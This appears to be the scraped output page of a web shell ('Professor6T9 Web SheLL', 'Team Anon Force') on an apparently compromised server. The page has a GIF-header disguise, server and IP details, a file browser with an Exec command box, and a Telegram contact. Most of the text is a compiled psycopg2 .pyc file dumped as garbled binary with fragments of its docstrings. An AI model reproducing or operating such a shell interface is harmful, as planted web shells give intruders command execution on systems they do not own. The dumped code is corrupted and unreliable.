GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
psycopg2
/
__pycache__
[ HOME ]
Exec
Submit
File Name : _ipaddress.cpython-38.pyc
U �}�h� � @ sf d Z ddlmZmZmZmZmZ ddlmZ da da ddd�Zdd� Zdd d �Z ddd�Zd d� ZdS )z>Implementation of the ipaddres-based network types adaptation � )�new_type�new_array_type� register_type�register_adapter�QuotedString)� text_typeNc C sR ddl a tdkrt� atD ]}t|| � qt jt jt jt jfD ]}t|t � q>dS )a Register conversion support between `ipaddress` objects and `network types`__. :param conn_or_curs: the scope where to register the type casters. If `!None` register them globally. After the function is called, PostgreSQL :sql:`inet` values will be converted into `~ipaddress.IPv4Interface` or `~ipaddress.IPv6Interface` objects, :sql:`cidr` values into into `~ipaddress.IPv4Network` or `~ipaddress.IPv6Network`. .. __: https://www.postgresql.org/docs/current/static/datatype-net-types.html r N) � ipaddress�_casters� _make_castersr � IPv4Interface� IPv6Interface�IPv4Network�IPv6Networkr �adapt_ipaddress)Zconn_or_curs�c�t� r �:/tmp/pip-target-hu2ovxdm/lib/python/psycopg2/_ipaddress.py�register_ipaddress&